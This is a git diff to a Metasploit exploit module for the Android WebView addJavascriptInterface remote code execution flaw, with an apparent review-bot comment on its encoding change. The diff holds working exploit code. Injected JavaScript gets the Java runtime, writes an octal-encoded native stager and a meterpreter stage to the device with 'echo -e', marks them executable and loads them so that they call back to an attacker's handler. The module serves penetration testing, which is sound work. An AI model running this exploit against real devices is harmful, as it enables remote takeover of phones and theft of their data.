diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
index 671fe0e83d..9e3e7c232e 100644
--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -69,7 +69,11 @@ class Metasploit3 < Msf::Exploit::Remote
 ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
 ['URL', 'http://50.56.33.56/blog/?p=314'],
 ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
- ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
+ ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
+ ['CVE', '2012-6636'], # original CVE for addJavascriptInterface
+ ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
+ ['EDB', '31519'],
+ ['OSVDB', '97520']
 ],
 'Platform' => 'android',
 'Arch' => ARCH_DALVIK,
@@ -89,8 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote
 def on_request_uri(cli, req)
 if req.uri =~ /\.js/
 serve_static_js(cli, req)
- elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100
- print_warning "Received message: #{req.body}"
 else
 super
 end
@@ -139,28 +141,15 @@ class Metasploit3 < Msf::Exploit::Remote
 .getMethod('getRuntime', null)
 .invoke(null, null);
- // now ensure we can write out a hex-encoded byte with the shell's echo builtin
- var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']);
- if (byte.indexOf("\\\\") > -1) {
- // if youre havin byte problems
- var xml = new XMLHttpRequest();
- // i feel bad for you son
- xml.open('POST', '#{get_module_resource}.msg', false);
- // i got \\x63 problems
- xml.send("Unsupported shell echo builtin: exploit aborted.");
- // but your shell aint one
- return true;
- }
-
 // libraryData contains the bytes for a native shared object built via NDK
 // which will load the "stage", which in this case is our android meterpreter stager.
 // LibraryData is loaded via ajax later, because we have to access javascript in
 // order to detect what arch we are running.
- var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename, arch), '\\\\x')}";
+ var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
 // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
 // another stager which loads android meterpreter from the msf handler.
- var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
+ var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
 // get the process name, which will give us our data path
 // $PPID does not seem to work on android 4.0, so we concat pids manually
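Review bot: The change from `Rex::Text.to_hex(..., '\\\\x')` to `Rex::Text.to_octal(..., '\\\\0')` on the two `var` lines is left unexplained, and the removed echo-probe block took with it the only comment that said why the escape format mattered at all. The four context comments above `var libraryData` still describe only what the buffer holds, so a reader has to cross-reference the next hunk to learn that the octal form exists to match the `echo -e` invocations there. A one-line comment above `var libraryData`, along the lines of `// octal escapes: these strings are consumed by the echo -e calls further down`, would keep the encoding and its consumer documented in one place; the same note applies to the two `echo -e` lines in the following hunk. The JavaScript template and the Ruby method that wraps it both begin and end outside this hunk.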
@@ -170,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote
 var stagePath = path + '/#{stagename}.apk';
 // build the library and chmod it
- runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
+ runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
 runtime.exec(['chmod', '700', libraryPath]).waitFor();
 // build the stage, chmod it, and load it
- runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
+ runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
 runtime.exec(['chmod', '700', stagePath]).waitFor();
 // load the library (this fails in x86, figure out why)